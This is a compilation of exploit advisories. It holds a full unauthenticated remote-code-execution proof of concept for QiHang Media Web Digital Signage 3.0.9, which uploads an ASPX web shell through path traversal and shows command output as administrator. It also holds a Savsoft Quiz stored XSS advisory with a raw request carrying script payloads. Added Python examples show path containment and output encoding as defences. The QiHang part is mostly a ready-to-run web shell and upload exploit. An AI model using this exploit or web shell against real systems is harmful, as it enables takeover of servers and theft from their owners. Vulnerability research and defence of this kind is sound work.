      "size": 25519.0,
      "uploadTime": new Date( 1525316885234 ),
      "path": "/xml"
    },
    {
      "name": "default.htm",
      "type": ".htm",
      "size": 1609.0,
      "uploadTime": new Date( 1523859040000 ),
      "path": "/default.htm"
    },
    {
      "name": "Global.asax",
      "type": ".asax",
      "size": 100.0,
      "uploadTime": new Date( 1523859032000 ),
      "path": "/Global.asax"
    },
    {
      "name": "IIS.dll",
      "type": ".dll",
      "size": 40960.0,
      "uploadTime": new Date( 1523859036000 ),
      ...
      ...
      "path": "/Media.Server.DeamonPlugin.Web.xml"
    },
    {
      "name": "preview.htm",
      "type": ".htm",
      "size": 947.0,
      "uploadTime": new Date( 1523859040000 ),
      "path": "/preview.htm"
    },
    {
      "name": "QH.aspx",
      "type": ".aspx",
      "size": 463.0,
      "uploadTime": new Date( 1523859030000 ),
      "path": "/QH.aspx"
    },
    {
      "name": "server.xml",
      "type": ".xml",
      "size": 206.0,
      "uploadTime": new Date( 1523859034000 ),
      "path": "/server.xml"
    },
    {
      "name": "Web.config",
      "type": ".config",
      "size": 2470.0,
      "uploadTime": new Date( 1523859034000 ),
      "path": "/Web.config"
    }
  ],
  "third": 0
}
-
QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)
# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)
# Date: 2020-08-12
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.howfor.com
# Tested on: Microsoft Windows Server 2012 R2 Datacenter
# CVE : N/A

<!--

QiHang Media Web (QH.aspx) Digital Signage 3.0.9 (pre-auth) Remote Code Execution


Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd.
        Guangzhou Hefeng Automation Technology Co., Ltd.
Product web page: http://www.howfor.com
Affected version: 3.0.9.0

Summary: Digital Signage Software.

Desc: The application suffers from an unauthenticated remote code execution. The vulnerability is caused due to lack of verification when uploading files with QH.aspx that can be written in any location by utilizing the 'remotePath' parameter to traverse through directories. Abusing the upload action and the 'fileToUpload' parameter, an unauthenticated attacker can exploit this to execute system commands by uploading a malicious ASPX script.

Tested on: Microsoft Windows Server 2012 R2 Datacenter
           Microsoft Windows Server 2003 Enterprise Edition
           ASP.NET 4.0.30319
           HowFor Web Server/5.6.0.0
           Microsoft ASP.NET Web QiHang IIS Server


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5582
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5582.php

27.07.2020

-->

<html>
  <body>
  <script>
    function uploadShellPoC() {
      var xhr = new XMLHttpRequest();
      xhr.open("POST", "http:\/\/192.168.1.74:8090\/QH.aspx", true);
      xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryhbcZX7o0Hw19h3kr");
      xhr.setRequestHeader("Accept", "*\/*");
      xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
      xhr.withCredentials = true;
      var body = "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" +
        "Content-Disposition: form-data; name=\"fileToUpload\"; filename=\"cmd.aspx\"\r\n" +
        "Content-Type: application/octet-stream\r\n" +
        "\r\n" +
        "\x3c%@ Page Language=\"VB\" Debug=\"true\" %\x3e\r\n" +
        "\x3c%@ import Namespace=\"system.IO\" %\x3e\r\n" +
        "\x3c%@ import Namespace=\"System.Diagnostics\" %\x3e\r\n" +
        "\r\n" +
        "\x3cscript runat=\"server\"\x3e\r\n" +
        "\r\n" +
        "Sub RunCmd(Src As Object, E As EventArgs)\r\n" +
        " Dim myProcess As New Process()\r\n" +
        " Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)\r\n" +
        " myProcessStartInfo.UseShellExecute = false\r\n" +
        " myProcessStartInfo.RedirectStandardOutput = true\r\n" +
        " myProcess.StartInfo = myProcessStartInfo\r\n" +
        " myProcessStartInfo.Arguments=xcmd.text\r\n" +
        " myProcess.Start()\r\n" +
        "\r\n" +
        " Dim myStreamReader As StreamReader = myProcess.StandardOutput\r\n" +
        " Dim myString As String = myStreamReader.Readtoend()\r\n" +
        " myProcess.Close()\r\n" +
        " mystring=replace(mystring,\"\x3c\",\"<\")\r\n" +
        " mystring=replace(mystring,\"\x3e\",\">\")\r\n" +
        " result.text= vbcrlf & \"\x3cpre\x3e\" & mystring & \"\x3c/pre\x3e\"\r\n" +
        "End Sub\r\n" +
        "\r\n" +
        "\x3c/script\x3e\r\n" +
        "\r\n" +
        "\x3chtml\x3e\r\n" +
        "\x3cbody\x3e\r\n" +
        "\x3cform runat=\"server\"\x3e\r\n" +
        "\x3cp\x3e\x3casp:Label id=\"L_p\" runat=\"server\" width=\"80px\"\x3eProgram\x3c/asp:Label\x3e\r\n" +
        "\x3casp:TextBox id=\"xpath\" runat=\"server\" Width=\"300px\"\x3ec:\\windows\\system32\\cmd.exe\x3c/asp:TextBox\x3e\r\n" +
        "\x3cp\x3e\x3casp:Label id=\"L_a\" runat=\"server\" width=\"80px\"\x3eArguments\x3c/asp:Label\x3e\r\n" +
        "\x3casp:TextBox id=\"xcmd\" runat=\"server\" Width=\"300px\" Text=\"/c net user\"\x3e/c net user\x3c/asp:TextBox\x3e\r\n" +
        "\x3cp\x3e\x3casp:Button id=\"Button\" onclick=\"runcmd\" runat=\"server\" Width=\"100px\" Text=\"Run\"\x3e\x3c/asp:Button\x3e\r\n" +
        "\x3cp\x3e\x3casp:Label id=\"result\" runat=\"server\"\x3e\x3c/asp:Label\x3e\r\n" +
        "\x3c/form\x3e\r\n" +
        "\x3c/body\x3e\r\n" +
        "\x3c/html\x3e\r\n" +
        "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" +
        "Content-Disposition: form-data; name=\"action\"\r\n" +
        "\r\n" +
        "upload\r\n" +
        "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" +
        "Content-Disposition: form-data; name=\"responderId\"\r\n" +
        "\r\n" +
        "ResourceNewResponder\r\n" +
        "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" +
        "Content-Disposition: form-data; name=\"remotePath\"\r\n" +
        "\r\n" +
        "/opt/resources\r\n" +
        "------WebKitFormBoundaryhbcZX7o0Hw19h3kr--\r\n";
      var aBody = new Uint8Array(body.length);
      for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
      xhr.send(new Blob([aBody]));
    }
  </script>
  <form action="#">
    <input type="button" value="Click" onclick="uploadShellPoC();" />
  </form>
  </body>
</html>

<!--

JSON response for successful upload:

{
  "first": true,
  "second": [
    "cmd.aspx"
  ]
}

GET request: http://192.168.1.74:8090/opt/resources/cmd.aspx
Command issued: /c whoami
Response: robertovolare\administrator

-->
-
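The three QiHang Media Web QH.aspx advisories above (file deletion via `data`, file disclosure via `fileName`/`path`, and upload via `remotePath`) share one root cause: a client-supplied path is used without confining it to the directory the action is meant to operate on. The following is an added example (not QiHang/HowFor code, not the advisory author's) of that containment check; the resource root, the sample inputs and the function names are constructed.

```python
# Added example (not QiHang/HowFor code): confine client-supplied paths for
# the delete, download/getAll and upload actions to one resource directory.
# The root directory, sample inputs and function names are constructed.
import json
import os
import posixpath
from urllib.parse import unquote

RESOURCE_ROOT = "/srv/signage/resources"     # constructed: the only directory the API may touch


def resolve_under_root(user_path, root=RESOURCE_ROOT):
    """Map a client path onto a filesystem path inside root, or raise ValueError.

    The value is percent-decoded first (the PoC sends .%2fQH.aspx), then
    absolute paths and Windows separators are refused outright, and the
    normalised result (realpath also follows symlinks) must still lie under
    root, which defeats ../ sequences however they are encoded."""
    decoded = unquote(user_path)
    if "\x00" in decoded or "\\" in decoded:
        raise ValueError("rejected: NUL or backslash in %r" % user_path)
    if posixpath.isabs(decoded):
        raise ValueError("rejected: absolute path %r" % user_path)
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(real_root, decoded))
    if os.path.commonpath([real_root, candidate]) != real_root:
        raise ValueError("rejected: %r escapes %s" % (user_path, root))
    return candidate


def is_contained(user_path, root=RESOURCE_ROOT):
    """Boolean form of resolve_under_root for quick checks."""
    try:
        resolve_under_root(user_path, root)
        return True
    except ValueError:
        return False


def paths_for_delete(data_param, root=RESOURCE_ROOT):
    """The delete action receives data=["..."]: every entry must resolve inside
    root or the whole request is refused (no partial deletes)."""
    entries = json.loads(data_param)
    if not isinstance(entries, list) or not all(isinstance(e, str) for e in entries):
        raise ValueError("data must be a JSON array of strings")
    return [resolve_under_root(e, root) for e in entries]


def delete_request_accepted(data_param, root=RESOURCE_ROOT):
    """True when every path in the delete request is contained."""
    try:
        paths_for_delete(data_param, root)
        return True
    except (ValueError, json.JSONDecodeError):
        return False
```

Note that the check decodes before validating; a validator that inspects the raw `%2f` form would pass the encoded traversal and the file API would then decode it.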
Savsoft Quiz 5 - Stored Cross-Site Scripting
# Exploit Title: Savsoft Quiz 5 - Stored Cross-Site Scripting
# Date: 2020-07-28
# Exploit Author: Mayur Parmar(th3cyb3rc0p)
# Vendor Homepage: https://savsoftquiz.com/
# Software Link: https://github.com/savsofts/savsoftquiz_v5.git
# Version: 5.0
# Tested on: Windows 10
# Contact: https://www.linkedin.com/in/th3cyb3rc0p/
# CVE: CVE-2020-24609

Stored Cross-site scripting (XSS):
Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent XSS.

Attack vector:
This vulnerability allows an attacker to inject the XSS payload in the User Registration section; each time the admin visits the Manage User section from the admin panel, the XSS triggers and the attacker is able to steal the cookie according to the crafted payload.

Vulnerable Parameters: First Name, Last Name

Steps to reproduce:
1. Go to the registration page.
2. Fill in the details and put the <script>alert("XSS")</script> payload in First Name and Last Name.
3. Now go to the Admin Panel; we can see that our payload gets executed.

POST /index.php/login/insert_user/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 255
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php/login/registration/
Cookie: ci_session=d99b121b1213b92a163181fd49c75f667dbce9ea
Upgrade-Insecure-Requests: 1

email=hack3r%40gmail.com&password=Hacker%40gmail.com&first_name=%3Cscript%3Ealert%28%22XSS+0%22%29%3B%3C%2Fscript%3E&last_name=%3Cscript%3Ealert%28%22XSS+2%22%29%3B%3C%2Fscript%3E&contact_no=9876543210&gid%5B%5D=1
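The stored values are harmless in the database; the defect is in the admin page that writes them into markup without encoding. The following is an added example (not Savsoft Quiz code, not the advisory author's): the posted body above parsed as the server sees it, then rendered into a user-list row both the vulnerable way and with HTML output encoding. The body copy is trimmed of the password field, and the function names are constructed.

```python
# Added example (not Savsoft Quiz code): parse the registration body from the
# request above and render the admin user-list row with and without output
# encoding. The body copy (password removed) and function names are constructed.
import html
from urllib.parse import parse_qs

# Constructed copy of the posted form body from the advisory (password field trimmed).
POSTED_BODY = (
    "email=hack3r%40gmail.com"
    "&first_name=%3Cscript%3Ealert%28%22XSS+0%22%29%3B%3C%2Fscript%3E"
    "&last_name=%3Cscript%3Ealert%28%22XSS+2%22%29%3B%3C%2Fscript%3E"
    "&contact_no=9876543210&gid%5B%5D=1"
)


def parse_registration(body):
    """Decode the x-www-form-urlencoded body into a flat dict (first value wins)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_user_row_unsafe(user):
    """Vulnerable pattern: stored field values dropped straight into markup,
    so the admin's browser executes whatever the registrant typed."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (user["first_name"], user["last_name"])


def render_user_row(user):
    """Hardened pattern: encode for the HTML text context at output time.
    html.escape also encodes both quote characters, so the same helper is
    safe inside quoted attribute values."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (
        html.escape(user["first_name"]),
        html.escape(user["last_name"]),
    )


def contains_script_tag(markup):
    """Quick check: does a <script> element survive in the rendered output?"""
    return "<script" in markup.lower()
```

Encoding at output (not at input) is what keeps the data usable elsewhere while making it inert in HTML; a Content-Security-Policy on the admin pages adds a second layer if a template is ever missed.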